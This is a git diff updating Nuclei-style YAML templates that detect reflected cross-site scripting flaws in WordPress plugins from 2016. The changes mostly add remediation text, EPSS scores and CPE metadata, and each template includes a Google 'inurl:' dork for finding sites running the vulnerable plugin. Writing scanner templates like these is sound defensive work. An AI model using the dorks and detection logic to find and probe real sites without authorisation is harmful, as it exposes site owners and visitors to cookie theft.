cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress defa-online-image-protector plugin (version 3.3 or higher) to mitigate this vulnerability. reference: - https://wordpress.org/plugins/defa-online-image-protector - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 - - http://web.archive.org/web/20210614204644/https://www.securityfocus.com/bid/93892 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000129 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: defa-online-image-protector_project + product: defa-online-image-protector + framework: wordpress google-query: inurl:"/wp-content/plugins/defa-online-image-protector" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,5 +48,4 @@ http: status: - 200 - -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402205ab009ec1cd5d67565e4bf917666a11a76531c0b1fbcad6851a687b0abe2d9c3022007458cb35dec36d3318c545b40a5be9cb3c407e6f27156c71940fcacfb514877:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 7754ec6e27..7e1c85a5e3 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: - https://wordpress.org/plugins/e-search - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 @@ -14,8 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000130 cwe-id: CWE-79 + epss-score: 0.00093 + epss-percentile: 0.39079 + cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: e-search_project + product: e-search + framework: wordpress google-query: inurl:"/wp-content/plugins/e-search" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a00473045022100b4ac1eb398aaf6f6d76de1a7e1d5be886aa16e7c5144103c313dec263d09a37d02201bb8265a66ad294bd6409191545d80776942a33374689003dbc55861646ab832:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index f544c7378f..b9ffa0fab7 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 - https://wordpress.org/plugins/e-search - - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49783 + cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: e-search_project + product: esearch + framework: wordpress google-query: inurl:"/wp-content/plugins/e-search" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100a5bff9f9a3cc66a57541643e0bab16000f15f9b10118310744f29a9a42c0c7c80221008583fe2249213188757dfba01d905fb0d078c15454aa1395c4dcc9768713563b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 8be1bb2d0a..991b7692ec 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - https://wordpress.org/plugins/enhanced-tooltipglossary - - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 + epss-score: 0.00116 + epss-percentile: 0.45096 + cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: cminds + product: tooltip_glossary + framework: wordpress google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a0047304502210096f339f07b34a1402f0b4f757a0def01ac302f22f1eb16f3a239fdc22ee86469022064822353282ea0ffc5b14c2e93f0871d94a9f3dbdde018435d6fb771793eeb9a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index cb837e770e..3ebe747b78 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress forget-about-shortcode-buttons plugin (1.1.1) or apply the necessary patches. reference: - https://wordpress.org/plugins/forget-about-shortcode-buttons - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000133 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49634 + cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: designsandcode + product: forget_about_shortcode_buttons + framework: wordpress google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a004730450220180205d249360ca7a49960005153eafccb07de7e76682748ff4948f78c7d676b022100ea809fd8a61280ebe68e0a1171d441f8fff7b13108886ad6749618f75dd2e60d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 560621b9b9..fe7f35ad3d 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49783 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: hdw-tube_project + product: hdw-tube + framework: wordpress google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100af4162a6eaaccb872d698abc34005a744560b6f15d36457abcc6112c1e59f686022100e3e4ddf265948b1d43b0718661977bd9aad9bbc89a98f86e0531ed1b2885f868:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 0ec5c03ee4..2c34d86f88 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210123183240/https://www.securityfocus.com/bid/93820/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49783 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: hdw-tube_project + product: hdw-tube + framework: wordpress google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402207ad216193a65b2b88cd09bb5eeefe330c02e3694db7e9d786f4378e2ecbb89c002205a64f12892c11020f9a681392604343c61db51ef9190e530fc8bff410483aa98:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 826cf6f0cb..c331d307f1 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of WordPress heat-trackr or apply the provided patch to fix the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://wordpress.org/plugins/heat-trackr @@ -14,8 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: heat-trackr_project + product: heat-trackr + framework: wordpress google-query: inurl:"/wp-content/plugins/heat-trackr" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a00463044022075802abe8da97759c9cef45ceac531a9f16d370b21a27b1c82f3423564332a7502204b07a80ccacb3f5a14c37e586c4ce7b498c2ae8190d0bc1a5e6716b1b55f41ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2b9ac102f9..f9ed3dc1d9 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - https://wordpress.org/plugins/hero-maps-pro - - http://web.archive.org/web/20210123183224/https://www.securityfocus.com/bid/93815/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,maps + epss-score: 0.00142 + epss-percentile: 0.49783 + cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: hero-maps-pro_project + product: hero-maps-pro + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin,maps http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100cb80201c501ee18a08a38daf0e27863005d1bf0ba4e9b6008574cfd74255c184022100be6a587991448b0ab8d3a4294cf3f859959eab1715cfb859a0b4be24ad8327b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1d5af96daa..b69e04059a 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=38 - https://wordpress.org/plugins/indexisto @@ -15,8 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: indexisto_project + product: indexisto + framework: wordpress google-query: inurl:"/wp-content/plugins/indexisto" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a0047304502207b376fd3d3dff8413d597d3d3353098311ef66262619efb0443eced58d9620e4022100d2febdbfd7c6d8a6944d45b7e1e0a9522d8a952fa9a13a707a2d63069609d94e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index c8dad56d8b..8122d8eaac 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://wordpress.org/plugins/infusionsoft @@ -15,8 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000139 cwe-id: CWE-79 + epss-score: 0.00116 + epss-percentile: 0.45096 + cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: infusionsoft_project + product: infusionsoft + framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft" tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan @@ -28,11 +36,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '"><"' - 'input type="text" name="ContactId"' condition: and - part: body - type: word part: header @@ -43,4 +51,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a00473045022100e5f719df9448f96615a4a1ded499a24cfd6bd1893527178c7946690290e9910b0220101d037b55a2975aa88e6f117c94ce769becd5d26fed3d595998203f4492890b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index cb3f50b71b..aef5c2fc78 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 - https://wordpress.org/plugins/new-year-firework - - http://web.archive.org/web/20210123183230/https://www.securityfocus.com/bid/93817/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: new-year-firework_project + product: new-year-firework + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100ad5a89382e8de6fa05bec572be914f9fb04767a25e40b9da819cecfe48900e70022100becf6421c87ecd1669e30402adc1c3bcead6326d845776936180ed9f665ebb04:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index be7f395d3a..f7cc223ab1 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -5,18 +5,24 @@ info: author: daffainfo severity: medium description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. + remediation: Upgrade to version 2.0 or higher. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - https://wordpress.org/plugins/page-layout-builder - remediation: Upgrade to version 2.0 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49634 + cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: page-layout-builder_project + product: page-layout-builder + framework: wordpress google-query: inurl:"/wp-content/plugins/page-layout-builder" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/24 +# digest: 4a0a0047304502210090140197f17ca9c114c75b1c2092cb329a8933a0bc7b026f89e14398ae05f8ab0220413e6a2ec10e9712e87fe2851b339115854eba49d1b5ea0a473b8ac4ba5b93cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 9bd58c6ba4..5316f3f13b 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary. reference: - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - http://www.vapidlabs.com/wp/wp_advisory.php?v=435 @@ -15,9 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000142 cwe-id: CWE-79 - tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve + epss-score: 0.00103 + epss-percentile: 0.41607 + cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: parsi-font_project + product: parsi-font + framework: wordpress + tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve http: - method: GET @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100b849369bbe75cc6253dec0771a3edd8b1f28bddf517361c6343976bfe1d545c7022100de6696903d45bca78f21433e000c9429b2c3c04381db0e5bdb7e19aed6a358bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 2343db06c3..88298d952c 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - https://wordpress.org/plugins/photoxhibit @@ -14,9 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss + epss-score: 0.00142 + epss-percentile: 0.49634 + cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: photoxhibit_project + product: photoxhibit + framework: wordpress + tags: cve,cve2016,wordpress,wp-plugin,xss http: - method: GET @@ -26,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402203d570ba3d69f75cafab47c6153ec7a9e8d655258686bd63127424922cc04d86a0220636ce445fea4be3a8ab345021751a4207f9a8364190022d2318ab5cd2b8058e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 94773f1d53..f04997af8f 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 - https://wordpress.org/plugins/pondol-formmail - - http://web.archive.org/web/20210615122859/https://www.securityfocus.com/bid/93584 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,mail + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: pondol-formmail_project + product: pondol-formmail + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin,mail http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100d96803730a4d1736bc19bdfd109d87dd11b7a8d5933dc79614f350590acc1691022100e140b7984c2b7816032fe2402fecd56a7cbd676424e9d3bdfe067ed6b573ad03:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 31f2f50493..4466330410 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://wordpress.org/plugins/s3-video @@ -15,9 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000148 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: s3-video_project + product: s3-video + framework: wordpress + tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: - method: GET @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '<"' - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a00473045022100aa60fdef13cc9b5770f1def1978a7fe27ed7a6e54e3283b676350cf62292849d022070f029d466a6f4ef3ddda0bffd67171c19e772acf534b794133b70249944e756:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 8277d9b653..594d77b218 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS 